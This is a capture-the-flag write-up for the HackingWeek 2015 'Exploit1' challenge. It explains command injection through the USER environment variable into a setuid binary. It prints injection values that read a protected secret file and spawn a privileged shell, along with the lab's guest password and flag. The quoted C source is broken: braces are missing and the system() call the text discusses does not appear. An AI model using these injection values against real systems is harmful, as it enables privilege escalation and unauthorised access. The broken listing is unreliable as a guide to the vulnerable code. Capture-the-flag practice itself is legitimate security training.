English [HackingWeek 2015] [Exploit1] Write Up


Log on as guest (password: shu1eKoo) on machine
You will find the hidden validation key in /home/exploit01/.secret.

$> ssh guest@


We were given those files:
guest@ns314076:/home/exploit01/project$ ls -la

total 24
dr-xr-xr-x 2 exploit01 exploit01 4096 Apr 29 15:17 .
dr-xr-xr-x 3 exploit01 exploit01 4096 Apr 29 15:18 ..
-r--r--r-- 1 exploit01 exploit01  208 Apr 29 15:16 Makefile
-r-sr-sr-x 1 exploit01 exploit01 5590 Apr 29 15:17 vulnerable
-r--r--r-- 1 exploit01 exploit01  345 Apr 29 15:13 vulnerable.c

The source of the “vulnerable” binary is provided, let’s check it.
guest@ns314076:/home/exploit01/project$ cat vulnerable.c

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
  char *buffer = NULL;
  gid_t gid = getegid();
  uid_t uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));

  return EXIT_SUCCESS;

As we can see, the system() call executes everything passed in the &buffer through the USER environment variable.
By default, the $USER variable contains the current logged user.
guest@ns314076:/home/exploit01/project$ echo $USER


So logically if we execute the binary, it will output guest:
guest@ns314076:/home/exploit01/project$ ./vulnerable

guest is using this program!

Now let’s replace “guest” by few commands, all separated by a semicolon.
We modify the USER variable to execute “/bin/echo me;cat ../.secret; echo is using this program!”:
guest@ns314076:/home/exploit01/project$ export USER='me;cat ../.secret; echo'

Then we relauch the program:
guest@ns314076:/home/exploit01/project$ ./vulnerable

is using this program!

Flag is raht6ae1Ue

By the way, if we wanted to get a shell, it would be possible using:
guest@ns314076:/home/exploit01/project$ export USER='me;/bin/sh;'
guest@ns314076:/home/exploit01/project$ ./vulnerable

sh-4.2$ cat /home/exploit01/.secret

Leave a Reply

Your email address will not be published. Required fields are marked *